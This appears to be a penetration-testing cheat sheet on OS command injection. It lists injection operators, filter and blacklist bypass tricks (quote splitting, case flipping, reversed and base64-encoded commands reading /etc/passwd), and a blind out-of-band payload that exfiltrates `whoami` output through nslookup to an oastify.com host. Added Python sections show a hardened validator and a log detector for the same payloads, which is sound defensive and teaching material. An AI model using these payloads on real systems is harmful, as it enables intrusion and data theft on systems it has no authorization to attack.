# Command Injection

| **Injection Operator** | **Injection Character** | **URL-Encoded Character** | **Executed Command**                       |
| ---------------------- | ----------------------- | ------------------------- | ------------------------------------------ |
| Semicolon              | `;`                     | `%3b`                     | Both                                       |
| New Line               | `\n`                    | `%0a`                     | Both                                       |
| Background             | `&`                     | `%26`                     | Both (second output generally shown first) |
| Pipe                   | `\|`                    | `%7c`                     | Both (only second output is shown)         |
| AND                    | `&&`                    | `%26%26`                  | Both (only if first succeeds)              |
| OR                     | `\|\|`                  | `%7c%7c`                  | Second (only if first fails)               |
| Sub-Shell              | \`\`                    | `%60%60`                  | Both (Linux-only)                          |
| Sub-Shell              | `$()`                   | `%24%28%29`               | Both (Linux-only)                          |
| Tab                    | `\t`                    | `%09`                     | Linux-only (space substitute)              |
| Space                  | ` `                     | `${IFS}` (substitute)     | Linux-only (space substitute)              |
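
The operators above only matter when untrusted input reaches a shell. The following Python example is added here and is not part of the original page: it contrasts the concatenation anti-pattern with an allowlist validator plus an argv list (`shell=False`), and shows that without a shell none of the operators in the table are interpreted. The `ping` wrapper and the `echo_argument` helper are hypothetical names chosen for the example.

```python
"""Vulnerable vs. hardened handling of a user-supplied host (added example)."""
import re
import subprocess
import sys

# Strict allowlist: IPv4 dotted quad or DNS hostname syntax only.
# Every operator in the table above (; \n & | && || `` $() \t ${IFS} and
# their %xx encodings) falls outside this character set, so it is rejected
# before any command is built.
HOST_RE = re.compile(
    r"(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
    r"(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*"
)


def vulnerable_ping_command(host: str) -> str:
    # The anti-pattern: string concatenation handed to /bin/sh.
    # Returned as a string only to make the contrast visible; never executed here.
    return "ping -c 1 " + host


def is_valid_host(host: str) -> bool:
    # fullmatch rejects a trailing newline that a bare '$' would tolerate.
    return HOST_RE.fullmatch(host) is not None


def build_ping_argv(host: str) -> list[str]:
    """Return the argv list for subprocess.run; raise on anything outside the allowlist."""
    if not is_valid_host(host):
        raise ValueError(f"rejected host: {host!r}")
    # argv list + shell=False: no shell ever parses this, so no operators exist.
    return ["ping", "-c", "1", host]


def echo_argument(value: str) -> str:
    """Show that with shell=False an argument reaches the child process literally.

    The Python interpreter stands in for any child program so the demo is portable.
    """
    proc = subprocess.run(
        [sys.executable, "-c", "import sys; print(sys.argv[1], end='')", value],
        capture_output=True, text=True, check=True,
    )
    return proc.stdout


if __name__ == "__main__":
    for candidate in ["10.10.10.10", "10.10.10.10;whoami", "10.10.10.10${IFS}id"]:
        print(f"{candidate!r:32} valid={is_valid_host(candidate)}")
    print("literal argv:", echo_argument("127.0.0.1; id"))
```

The allowlist is the primary control; the argv list is defence in depth for the case where validation is later loosened. If a shell is genuinely required (pipes, globbing), quote with `shlex.quote` as a last resort rather than stripping operators, because the bypass sections below show how character blacklists fail.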

{% hint style="info" %}
If the error message displays a different page, with information such as our IP and our request, this may indicate that the request was blocked by a WAF.
{% endhint %}

## Environment Variables

| Platform   | Variable            | Result                                        |
| ---------- | ------------------- | --------------------------------------------- |
| Linux      | `${IFS}`            | space (commonly used to evade space filters)  |
| Linux      | `${PATH:0:1}`       | `/`                                           |
| Linux      | `${LS_COLORS:10:1}` | `;`                                           |
| Windows    | `%HOMEPATH:~6,-11%` | `\`                                           |
| PowerShell | `$env:HOMEPATH[0]`  | `\`                                           |

## Bypassing Blacklisted Commands

```bash
#Linux
Intrusionz3r0@htb[/htb]$ w'h'o'am'i
21y4d
Intrusionz3r0@htb[/htb]$ w"h"o"am"i
Intrusionz3r0@htb[/htb]$ who$@ami
Intrusionz3r0@htb[/htb]$ w\ho\am\i
Intrusionz3r0@htb[/htb]$ {cat,/etc/passwd}

#Windows
C:\htb> who^ami
```

## Case manipulation

{% hint style="info" %}
Linux is case-sensitive, hence we have to get a bit creative and find a command that turns the command into an all-lowercase word.
{% endhint %}

```bash
#Windows
PS C:\htb> WhOaMi
#Linux
Intrusionz3r0@htb[/htb]$ $(tr "[A-Z]" "[a-z]"<<<"cAt") /etc/passwd
Intrusionz3r0@htb[/htb]$ $(a="printENv";printf %s "${a,,}")

#Example payload with spaces replaced by %09 / ${IFS} and slashes by ${PATH:0:1}
$(tr%09"[A-Z]"%09"[a-z]"<<<"cAt")${IFS}${PATH:0:1}etc${PATH:0:1}passwd
```

## Reversing commands

```bash
#Get the word in reverse
Intrusionz3r0@htb[/htb]$ echo 'whoami' | rev
PS C:\htb> "whoami"[-1..-20] -join ''
Output: imaohw

#Execute command
Intrusionz3r0@htb[/htb]$ $(rev<<<'imaohw')
PS C:\htb> iex "$('imaohw'[-1..-20] -join '')"
Output: Intrusionz3r0
```

## Encode Commands

```bash
Intrusionz3r0@htb[/htb]$ echo -n 'cat /etc/passwd | grep 33' | base64
output: Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==

Intrusionz3r0@htb[/htb]$ bash<<<$(base64 -d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==)
output: www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin

Intrusionz3r0@htb[/htb]$ echo -n whoami | iconv -f utf-8 -t utf-16le | base64
PS C:\htb> [Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('whoami'))
Output: dwBoAG8AYQBtAGkA

PS C:\htb> iex "$([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String('dwBoAG8AYQBtAGkA')))"
```
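
On the detection side, the operator table, the environment-variable substitutions and the encoding tricks above describe exactly what a log review should look for. The Python detector below is an added example, not code from the original page: it URL-decodes each query parameter (twice, for double encoding), attempts a base64 decode of long alphanumeric tokens, and reports which operators from this page appear in any layer. The access-log lines are constructed for the example, and the simple `client METHOD target status` line format is an assumption.

```python
"""Flag command-injection operators in request parameters (added example)."""
import base64
import re
from urllib.parse import unquote

# Operators and evasions collected from the tables on this page.
OPERATOR_PATTERNS = [
    (r";", "semicolon"),
    (r"\n", "newline"),
    (r"&&|\|\||[&|]", "ampersand-or-pipe"),
    (r"`[^`]*`", "backtick"),
    (r"\$\(", "subshell"),
    (r"\$\{IFS\}", "ifs"),
    (r"\$\{[A-Za-z_]+:\d+:\d+\}", "envslice"),   # ${PATH:0:1}, ${LS_COLORS:10:1}
    (r"\t", "tab"),
]
OPERATOR_RE = re.compile(
    "|".join(f"(?P<g{i}>{pat})" for i, (pat, _) in enumerate(OPERATOR_PATTERNS))
)
# Long base64-looking tokens; short ones produce too much noise.
B64_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")

# Constructed sample log lines: "client METHOD target status" (format assumed).
LOG_LINES = [
    "10.0.0.5 GET /ping?ip=10.10.10.10 200",
    "10.0.0.9 GET /ping?ip=10.10.10.10%3bwhoami 200",
    "10.0.0.9 GET /ping?ip=10.10.10.10%0acat${IFS}/etc/passwd 500",
    "10.0.0.9 GET /ping?ip=10.10.10.10%26%26%24%28whoami%29 200",
    "10.0.0.9 GET /ping?ip=1%3bbash<<<$(base64%20-d<<<Y2F0IC9ldGMvcGFzc3dkIHwgZ3JlcCAzMw==) 200",
]


def decode_layers(value: str) -> list[str]:
    """Return the raw value plus URL-decoded (up to 2 rounds) and base64-decoded views."""
    views = [value]
    current = value
    for _ in range(2):                      # handle double URL encoding
        decoded = unquote(current)
        if decoded == current:
            break
        views.append(decoded)
        current = decoded
    for token in B64_RE.findall(current):
        try:
            # validate=True rejects tokens with stray characters or bad padding.
            views.append(base64.b64decode(token, validate=True).decode("utf-8", "replace"))
        except ValueError:                  # binascii.Error is a ValueError
            pass
    return views


def find_operators(value: str) -> list[str]:
    """Sorted, de-duplicated operator labels found in any decoded layer of value."""
    labels = set()
    for view in decode_layers(value):
        for match in OPERATOR_RE.finditer(view):
            labels.add(OPERATOR_PATTERNS[int(match.lastgroup[1:])][1])
    return sorted(labels)


def scan_log(lines: list[str]) -> list[tuple[str, str, list[str]]]:
    """Return (client, parameter, labels) for every parameter carrying an operator."""
    findings = []
    for line in lines:
        client, _method, target, _status = line.split()
        query = target.partition("?")[2]
        # A literal '&' splits parameters here; an encoded %26 stays inside the value.
        for part in query.split("&"):
            name, _, raw_value = part.partition("=")
            labels = find_operators(raw_value)
            if labels:
                findings.append((client, name, labels))
    return findings


if __name__ == "__main__":
    for client, name, labels in scan_log(LOG_LINES):
        print(f"{client} param={name} operators={labels}")
```

Base64 decoding of random-looking tokens can yield bytes that happen to contain `|` or `&`, so treat the base64 layer as a lower-confidence signal than a direct hit, and pair any alert with the WAF indicator described in the hint above.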

## Blind OS command injection with out-of-band data exfiltration

```sh
& nslookup `whoami`929y6u9dkdbxdod9zzkjvxf7vy1pplda.oastify.com #
```

## Miscellaneous commands

| **Injection Type**                      | **Operators**                                     |
| --------------------------------------- | ------------------------------------------------- |
| SQL Injection                           | `'` `,` `;` `--` `/* */`                          |
| Command Injection                       | `;` `&&`                                          |
| LDAP Injection                          | `*` `(` `)` `&` `\|`                              |
| XPath Injection                         | `'` `or` `and` `not` `substring` `concat` `count` |
| OS Command Injection                    | `;` `&` `\|`                                      |
| Code Injection                          | `'` `;` `--` `/* */` `$()` `${}` `#{}` `%{}` `^`  |
| Directory Traversal/File Path Traversal | `../` `..\` `%00`                                 |
| Object Injection                        | `;` `&` `\|`                                      |
| XQuery Injection                        | `'` `;` `--` `/* */`                              |
| Shellcode Injection                     | `\x` `\u` `%u` `%n`                               |
| Header Injection                        | `\n` `\r\n` `\t` `%0d` `%0a` `%09`                |

## Tools

<https://github.com/Bashfuscator/Bashfuscator>

<https://github.com/danielbohannon/Invoke-DOSfuscation>
